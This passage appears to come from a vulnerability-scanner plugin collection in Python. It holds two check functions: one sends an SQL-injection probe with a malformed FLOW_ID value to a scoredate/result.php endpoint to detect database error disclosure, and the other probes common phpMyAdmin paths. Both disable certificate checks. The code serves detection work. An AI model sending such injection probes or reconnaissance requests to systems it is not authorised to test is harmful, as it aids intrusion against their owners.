                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
def check(host, port=80):
    """Detect SQL error disclosure in the ``scoredate/result.php`` ``FLOW_ID`` parameter.

    One GET with a malformed ``FLOW_ID`` value is sent; a body containing
    ``SQL语句`` (a database-error label) is recorded. Returns ``(True, host,
    url, body)`` on a hit, ``False`` otherwise or on any exception.
    Mitigation: parameterise the query and suppress verbose database errors.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20']
    markers = ['SQL语句']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, timeout=7, verify=False).text
                if any(m in body for m in markers):
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False
def check(host, port=80):
    """Locate a phpMyAdmin installation at common directory names.

    Each candidate path is fetched; a body containing ``PMA_commonParams`` or
    ``PMA_sendHeaderLocation`` identifies phpMyAdmin. Returns ``(True, host,
    url, body)`` on the first hit, ``False`` otherwise or on any exception.
    Mitigation: restrict database consoles to trusted networks.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/phpmyadmin', '/database', '/pma', '/db', '/mysql', '/console']
    markers = ['PMA_commonParams', 'PMA_sendHeaderLocation']
    try:
        # Certificate verification is switched off for these requests.
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for url in ['{}{}'.format(base, uri) for uri in uris]:
                body = session.get(url, timeout=7, verify=False).text
                if any(m in body for m in markers):
                    insert_vuln_db(host, url, body, plugin_id)
                    return True, host, url, body
    except Exception:
        return False
    return False